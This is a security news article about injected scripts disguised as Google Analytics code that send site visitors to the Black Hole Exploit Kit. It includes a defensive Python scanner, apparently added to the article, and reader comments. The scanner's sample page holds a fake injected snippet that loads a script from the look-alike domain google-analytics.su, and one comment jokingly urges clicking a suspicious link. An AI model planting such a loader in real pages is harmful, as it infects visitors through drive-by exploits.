Attackers Using Fake Google Analytics Code to Redirect Users to Black Hole Exploit Kit

Injecting malicious code into the HTML used on legitimate Web sites is a key part of the infection lifecycle for many attack crews, and they often disguise and obfuscate their code to make it more difficult to analyze or so it appears to be legitimate code. The latest instance of this technique has seen attackers employing code that is meant to look like Google Analytics snippets, but instead sends victims off to a remote site that’s hosting the Black Hole Exploit Kit. Not the desired result.

Researchers at Websense discovered the ongoing attack recently, and found that the code being used to hide the fake Google Analytics tags is heavily obfuscated, making analysis quite difficult. The malicious code, which is being injected into benign pages on legitimate sites, is designed to look just like actual Google Analytics code and to appear as though it’s referring to common domains. But there are some tell-tale signs that this isn’t the case.

“It is quite convincing at first glance, but remember, usually we put the analytics code at the bottom of the page, instead of at the top, so this is a good hint to Web masters. Another hint is that they are using “UA-XXXXX-X”, a placeholder as their “Google Analytics account”, obviously this is not what people usually do. We found other similar domains like google-analytics[dot]su in this attack, and will update once we find more,” Websense’s Tim Xia wrote in an analysis of the attack campaign.
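The three tell-tale signs quoted above (a snippet sitting at the top of the page, the "UA-XXXXX-X" placeholder left in place of a real account ID, and a look-alike domain such as google-analytics[dot]su) can be turned into a simple check a webmaster can run over their own pages. The scanner below is an added example written for this article, not Websense's or Threatpost's code; it assumes the genuine ga.js snippet loads only from google-analytics.com, and the obfuscation markers it looks for (eval, unescape, fromCharCode, long hex-escape runs) are a generic heuristic of my own, not something the article describes. The sample page it scans is constructed for the example.

```python
"""Heuristic scanner for injected scripts that imitate Google Analytics.

Added example for this article, not Websense's or Threatpost's code. It
flags the tell-tale signs the article lists: a placeholder tracking ID
("UA-XXXXX-X"), a look-alike domain such as google-analytics.su, and an
analytics-looking snippet placed at the top of the page instead of the
bottom. The obfuscation markers are a generic heuristic added here.
"""
import re
from html.parser import HTMLParser

# The host the genuine ga.js snippet loads from (with a www. or ssl. prefix).
REAL_GA_HOST = "google-analytics.com"

PLACEHOLDER_ID = re.compile(r"UA-X{3,}-X\b")           # literal placeholder
ACCOUNT_ID = re.compile(r"UA-\w+-\w+")                   # any GA-style account ID
LOOKALIKE = re.compile(r"google-analytics\.[a-z]{2,}", re.I)  # domain + TLD
# Generic obfuscation markers (assumption, not from the article).
OBFUSCATION = re.compile(r"eval\(|unescape\(|fromCharCode|(?:\\x[0-9a-f]{2}){8,}", re.I)


class ScriptCollector(HTMLParser):
    """Collect every <script> with its src, inline body and position."""

    def __init__(self):
        super().__init__()
        self.in_head = False
        self.in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "head":
            self.in_head = True
        elif tag == "script":
            self.in_script = True
            self.scripts.append({"src": dict(attrs).get("src") or "", "body": "",
                                 "in_head": self.in_head, "line": self.getpos()[0]})

    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False
        elif tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Script bodies arrive through handle_data; they may come in chunks.
        if self.in_script and self.scripts:
            self.scripts[-1]["body"] += data


def scan_html(html):
    """Return (line, reason) findings for scripts that imitate Google Analytics."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for s in collector.scripts:
        text = s["src"] + "\n" + s["body"]
        # Only scripts that mention an analytics domain or account ID are of interest.
        if not (LOOKALIKE.search(text) or ACCOUNT_ID.search(text)):
            continue
        if PLACEHOLDER_ID.search(text):
            findings.append((s["line"], "placeholder tracking ID left in snippet"))
        for domain in sorted({m.group(0).lower() for m in LOOKALIKE.finditer(text)}):
            if domain != REAL_GA_HOST:
                findings.append((s["line"], f"look-alike analytics domain {domain}"))
        if s["in_head"]:
            findings.append((s["line"], "analytics snippet placed at the top of the page (inside <head>)"))
        if OBFUSCATION.search(s["body"]):
            findings.append((s["line"], "obfuscation markers in inline script"))
    return findings


# Constructed sample: an injected fake snippet in <head> plus the site's own
# analytics snippet at the bottom of <body>.
SAMPLE_PAGE = """<html><head><title>Example</title>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-XXXXX-X']);
_gaq.push(['_trackPageview']);
(function() { var ga = document.createElement('script');
ga.src = 'http://google-analytics.su/ga.js';
document.getElementsByTagName('head')[0].appendChild(ga); })();
</script>
</head><body><p>Welcome</p>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-123456-1']);
_gaq.push(['_trackPageview']);
(function() { var ga = document.createElement('script');
ga.src = 'http://www.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();
</script>
</body></html>"""

if __name__ == "__main__":
    for line, reason in scan_html(SAMPLE_PAGE):
        print(f"line {line}: {reason}")
```

On the sample page only the snippet in `<head>` is reported (placeholder ID, look-alike domain, top-of-page placement); the genuine-looking snippet at the bottom of `<body>` produces no findings. The placement check is deliberately coarse: it flags anything inside `<head>`, so a site that legitimately puts its analytics tag there will need to whitelist its own snippet.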

The end result of the infection routine is that the victim is passed off to a site that is hosting the Black Hole Exploit Kit, a notoriously nasty piece of software that will try a grab-bag of exploits against the victim’s browser until one works. Once that’s done, another piece of malware typically is installed on the user’s machine, perhaps a keylogger or banker Trojan designed to relieve the victim of her money.

Black Hole is one of several readily available exploit kits that attack crews of all makes and models use to install malware on thousands of machines. Black Hole, along with other kits, such as Eleonore and Siberia, give attackers a built-in set of exploits that can be used to go after vulnerabilities in browsers such as Internet Explorer, Firefox and Chrome. Last spring, a version of Black Hole was uploaded to some file-sharing sites and made available for free. At the time, researchers said that they expected Black Hole to be used in more attacks going forward, and that prediction has been borne out.

“If the ZeuS leak was like giving a machine gun for free, giving away exploit kits is like providing the ammo. We will now see much more use of those exploit and malware kits by less talented groups of cyber criminals,” Aviv Raff, CTO at security firm Seculert, said at the time of the leak of the free version of Black Hole.

Discussion

  • David on

    So I get an e-mail that appears to come from a member of a blog type webpage to which I subscribe. Nothing much in the e-mail message except a link for a webpage with a name like "photos" or something.  Could it be a link to something serving Black Hole?

  • Dennis Fisher on

    That's certainly possible. In many cases, those emails redirect you to a page that includes some kind of drive-by download exploit, and those often are done with Black Hole or Eleonore or something similar. Just opening those emails can be dangerous, so I'd avoid that if at all possible.

  • Anonymous on

    Click on the link. Do it. Be somebody.

  • Anonymous on

    Of course it *could* be malicious, but instead of asking general theory in a forum you could copy the link location and run it through wepawet or virustotal and test it yourself.

  • Anonymous on

    Use a VM, with webscarab and wireshark running.  Have some fun.

  • Anonymous on

    So I take it that since I have google analytics as something not allowed by default on NoScript, I should be a little bit safer, at least in regards to sites that have been hit by this? Actually I have all scripts pretty much turned off and only let them in one at a time if it's something I really need.

  • Doc Ray on

    upgrade ur lives and get a mac...

    ;)
